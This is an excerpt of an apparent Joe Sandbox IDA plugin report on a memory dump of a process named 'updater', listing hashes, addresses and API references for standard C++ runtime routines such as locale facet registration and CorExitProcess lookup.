Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: e9708fb2d5c35d02fcc770d67496fad35aac874373949c355657ef6d02ce0781
Instruction ID: 17d10539805a12abf2dd4d89159b1c2814f114af2b38a332638d852d059e8185
Opcode Fuzzy Hash: e9708fb2d5c35d02fcc770d67496fad35aac874373949c355657ef6d02ce0781
Instruction Fuzzy Hash: D101C075D00116DBCB06EBAAD844AAEBB74BFA0714F28416ED8116B2F1CF749E05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140C546 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C557
int.LIBCPMT ref: 0140C56E

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

moneypunct.LIBCPMT ref: 0140C591
std::_Facet_Register.LIBCPMT ref: 0140C5A8
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C5C8
Concurrency::cancel_current_task.LIBCPMT ref: 0140C5D5

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: a30acef829e6c8c98bb2cc2faa458fbd2aec2ccf57414465d959f56a94a562be
Instruction ID: fbdfb74f4809fa88de22d736a2fcce886b55774ca0c5133685ce57ee6b440583
Opcode Fuzzy Hash: a30acef829e6c8c98bb2cc2faa458fbd2aec2ccf57414465d959f56a94a562be
Instruction Fuzzy Hash: 2001443AC00226CBCB02ABAA8840AAEB760BF60624F18415EE810673F0DF309A01D781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C5DB Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C5EC
int.LIBCPMT ref: 0140C603

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

moneypunct.LIBCPMT ref: 0140C626
std::_Facet_Register.LIBCPMT ref: 0140C63D
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C65D
Concurrency::cancel_current_task.LIBCPMT ref: 0140C66A

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 0c76a3ce3505f89233f24614890ad9bd711e764720ad35eb3fbc206aba728416
Instruction ID: 55e48ebea755995f74c825644d3ff1e6b6c5a945ebdeade1f0d0b4fa7c0ca529
Opcode Fuzzy Hash: 0c76a3ce3505f89233f24614890ad9bd711e764720ad35eb3fbc206aba728416
Instruction Fuzzy Hash: 7F010035D00116CBCB16EBA98850ABEBB70BFA0724F28465EE806673F0CF749A01D781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C41C Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C42D
int.LIBCPMT ref: 0140C444

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

moneypunct.LIBCPMT ref: 0140C467
std::_Facet_Register.LIBCPMT ref: 0140C47E
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C49E
Concurrency::cancel_current_task.LIBCPMT ref: 0140C4AB

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 48fb02056b33801482f7c1a2cfd524a41838280a5255826d4065508062016bc1
Instruction ID: 9e4a313b8038aa5451d464635e45aae3bc1d8aa622ebf079ae027d90ea42377b
Opcode Fuzzy Hash: 48fb02056b33801482f7c1a2cfd524a41838280a5255826d4065508062016bc1
Instruction Fuzzy Hash: 9701E175D0011ADBCB16EB698844ABEB764BFA4B24F19416EE805672E0CB348A05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140C4B1 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C4C2
int.LIBCPMT ref: 0140C4D9

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

moneypunct.LIBCPMT ref: 0140C4FC
std::_Facet_Register.LIBCPMT ref: 0140C513
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C533
Concurrency::cancel_current_task.LIBCPMT ref: 0140C540

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 52c733003f1691b2072b49a9cd1ed078cd3d41b514af76f89d39eee0a82f07fe
Instruction ID: 257d6672b0594530ecc121c950e12a90be63fb8fca1083145bddbbd8a5129de2
Opcode Fuzzy Hash: 52c733003f1691b2072b49a9cd1ed078cd3d41b514af76f89d39eee0a82f07fe
Instruction Fuzzy Hash: EC012635900226DBCB06EB69C840ABE7770BFA4724F28015ED801673F0DF349E01C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C959 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C96A
int.LIBCPMT ref: 0140C981

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

numpunct.LIBCPMT ref: 0140C9A4
std::_Facet_Register.LIBCPMT ref: 0140C9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C9DB
Concurrency::cancel_current_task.LIBCPMT ref: 0140C9E8

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1910018792-0
Opcode ID: 5604109eab3387f01ba7bce5809e0fc0fab4577873a7e6202591a6b03b55f841
Instruction ID: 2973672f339d064bbf5172a30a33f5293cc84e6b1672406cec79ad6995e8e70f
Opcode Fuzzy Hash: 5604109eab3387f01ba7bce5809e0fc0fab4577873a7e6202591a6b03b55f841
Instruction Fuzzy Hash: 3701C035D00116DBCB06EB6A8844ABEBB71BFA0614F18425FE811A73F0CF349A05DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140C8C4 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C8D5
int.LIBCPMT ref: 0140C8EC

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

numpunct.LIBCPMT ref: 0140C90F
std::_Facet_Register.LIBCPMT ref: 0140C926
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C946
Concurrency::cancel_current_task.LIBCPMT ref: 0140C953

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1910018792-0
Opcode ID: b6970391ae377bb2ad9a2c0f45f2b30231866e6be55c80c93cb7dfc7aa25e3b5
Instruction ID: ee9c4666404bd1688d4e0ce11e90403c38fe40a1fa67a8c7a0d972f35dc1b489
Opcode Fuzzy Hash: b6970391ae377bb2ad9a2c0f45f2b30231866e6be55c80c93cb7dfc7aa25e3b5
Instruction Fuzzy Hash: FC01C075900116CBCB06AB69C854AAEBB74BFA0728F28415ED815673F1CF749E05C792

Uniqueness

Uniqueness Score: -1.00%

Function 01406F3F Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01406F50
int.LIBCPMT ref: 01406F67

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

ctype.LIBCPMT ref: 01406F8A
std::_Facet_Register.LIBCPMT ref: 01406FA1
std::_Lockit::~_Lockit.LIBCPMT ref: 01406FC1
Concurrency::cancel_current_task.LIBCPMT ref: 01406FCE

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
String ID:
API String ID: 3097546199-0
Opcode ID: 1a30666df0c82139b70c4d718661d830eed1efa4e6436ff13633d29ac05b3568
Instruction ID: 4f6bf409df68c54e2d28dc16d292ed4c3b653a7d08c407b74506125f7a4e122a
Opcode Fuzzy Hash: 1a30666df0c82139b70c4d718661d830eed1efa4e6436ff13633d29ac05b3568
Instruction Fuzzy Hash: 90012635D001169BDB06EB69C850ABEB775BF60724F29001EE801A73F0CF349E15CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01406EAA Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01406EBB
int.LIBCPMT ref: 01406ED2

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

codecvt.LIBCPMT ref: 01406EF5
std::_Facet_Register.LIBCPMT ref: 01406F0C
std::_Lockit::~_Lockit.LIBCPMT ref: 01406F2C
Concurrency::cancel_current_task.LIBCPMT ref: 01406F39

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 3595785899-0
Opcode ID: 58451db1d6284c5cbd0bd906128627faeea47854860e63964d059772cea60185
Instruction ID: 839e9c9d12b041fb143275886084c68e2685151c5f0131590ecb01c84c6ce48d
Opcode Fuzzy Hash: 58451db1d6284c5cbd0bd906128627faeea47854860e63964d059772cea60185
Instruction Fuzzy Hash: EF010435900217DBCB16EB6AD810ABEBB64BFA0724F19001ED901673F0CF749E41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 014070FE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140710F
int.LIBCPMT ref: 01407126

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

numpunct.LIBCPMT ref: 01407149
std::_Facet_Register.LIBCPMT ref: 01407160
std::_Lockit::~_Lockit.LIBCPMT ref: 01407180
Concurrency::cancel_current_task.LIBCPMT ref: 0140718D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1910018792-0
Opcode ID: c314435fbeb7f8e84b075f25ab200c7e6bff9b0be3b122b01dd9e658e16ec2b2
Instruction ID: 8acb9d4950b39e6199dbac4aaefba3abda2831c9f4b1ee8d58e60d79ebc81d82
Opcode Fuzzy Hash: c314435fbeb7f8e84b075f25ab200c7e6bff9b0be3b122b01dd9e658e16ec2b2
Instruction Fuzzy Hash: AC01C435D002169BDB16EF69D804ABEB771BF60615F18401ED8556B3F0CF349E01C782

Uniqueness

Uniqueness Score: -1.00%

Function 01419417 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01419428
int.LIBCPMT ref: 0141943F

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

collate.LIBCPMT ref: 01419462
std::_Facet_Register.LIBCPMT ref: 01419479
std::_Lockit::~_Lockit.LIBCPMT ref: 01419499
Concurrency::cancel_current_task.LIBCPMT ref: 014194A6

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 3223962878-0
Opcode ID: 418b957078914329848d71b5028e701337d6ab76d292a4bc582426ac72703803
Instruction ID: 3c7134edf476740094a1356776b3f75cdc2fbd448af89fba2b2c24220f706344
Opcode Fuzzy Hash: 418b957078914329848d71b5028e701337d6ab76d292a4bc582426ac72703803
Instruction Fuzzy Hash: 93010035D002169BDB16EF69C810AAEBB61BFA4728F19401ED805673F8CF349E05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 014194AC Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014194BD
int.LIBCPMT ref: 014194D4

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

messages.LIBCPMT ref: 014194F7
std::_Facet_Register.LIBCPMT ref: 0141950E
std::_Lockit::~_Lockit.LIBCPMT ref: 0141952E
Concurrency::cancel_current_task.LIBCPMT ref: 0141953B

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: 3b5033539ef817c51e5b4c0f19d5d9bf165042ce4e63c8aea5774f4f96179958
Instruction ID: 1d1e77c4bf23de5cdf2ee2db2ede1267b80f99ce5592f7fb5b866d984e005784
Opcode Fuzzy Hash: 3b5033539ef817c51e5b4c0f19d5d9bf165042ce4e63c8aea5774f4f96179958
Instruction Fuzzy Hash: 4E01C47690021ACBCB05EB69C824ABEB764BFA0B28F18410ED801672F9CF349A05C781

Uniqueness

Uniqueness Score: -1.00%

Function 01419700 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01419711
int.LIBCPMT ref: 01419728

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

moneypunct.LIBCPMT ref: 0141974B
std::_Facet_Register.LIBCPMT ref: 01419762
std::_Lockit::~_Lockit.LIBCPMT ref: 01419782
Concurrency::cancel_current_task.LIBCPMT ref: 0141978F

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 696e1405290a0b86c50c409017ecc723e63dfb1c9d566bdee85818bc00ff64cb
Instruction ID: 926323da058ed7e66ccfa16069bb128a23a5b8f2103eacc0ac922ad332ac8fd7
Opcode Fuzzy Hash: 696e1405290a0b86c50c409017ecc723e63dfb1c9d566bdee85818bc00ff64cb
Instruction Fuzzy Hash: 5401AD35D00216DBCB16AF69C814AAEBBB1BFA0B18F29400ED915672E5DB349A05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0141966B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0141967C
int.LIBCPMT ref: 01419693

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

moneypunct.LIBCPMT ref: 014196B6
std::_Facet_Register.LIBCPMT ref: 014196CD
std::_Lockit::~_Lockit.LIBCPMT ref: 014196ED
Concurrency::cancel_current_task.LIBCPMT ref: 014196FA

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 14e2783945d78e2baf7d3c18d04907f74c18fbc185aad552db1e3fa1daadfe43
Instruction ID: 708712f43d10e0852d87471412e5389d659aa3a6c018ef58b00f2b070cd0dcf7
Opcode Fuzzy Hash: 14e2783945d78e2baf7d3c18d04907f74c18fbc185aad552db1e3fa1daadfe43
Instruction Fuzzy Hash: E801C0399001168BCB06EB68C824AAEBB71BFA0728F18450FD809672F4CF359E02C791

Uniqueness

Uniqueness Score: -1.00%

Function 01437946 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 01437994
_free.LIBCMT ref: 01437AE0

Strings

*?, xrefs: 01437989

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
Instruction ID: b40fa9aa363c09781f2cecd6a9537e4f89fb9db740511d220c32055a29c821b6
Opcode Fuzzy Hash: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
Instruction Fuzzy Hash: 36615CB1E002199FDF15DFA9C8809EEFBF5EF9C310B14816AE855E7310E635AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 013C171B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013C1730
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013C176D

Part of subcall function 0140A8A9: _Yarn.LIBCPMT ref: 0140A8C8
Part of subcall function 0140A8A9: _Yarn.LIBCPMT ref: 0140A8EC

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 013C17AE
std::_Lockit::~_Lockit.LIBCPMT ref: 013C181F

Strings

bad locale name, xrefs: 013C1786

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2090653598-1405518554
Opcode ID: c1e1f51bb71ef6c44330e2670a6646e768445effcb7c6b75f76d62750453b17c
Instruction ID: 7062aab207de762138289d700b2d4510dbb44afc0157adebb2671eecb9339906
Opcode Fuzzy Hash: c1e1f51bb71ef6c44330e2670a6646e768445effcb7c6b75f76d62750453b17c
Instruction Fuzzy Hash: 58319E72804B10DFD7369F1BE840656FBF0FF68A10B608A2FE09E86A60C734A541DB59

Uniqueness

Uniqueness Score: -1.00%

Function 014227C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,014227B7,?,?,0142277F,?,?,?), ref: 014227D7
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,014227B7,?,?,0142277F,?,?,?), ref: 014227EA
FreeLibrary.KERNEL32(00000000,?,?,014227B7,?,?,0142277F,?,?,?), ref: 0142280D

Strings

mscoree.dll, xrefs: 014227D0
CorExitProcess, xrefs: 014227E2

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
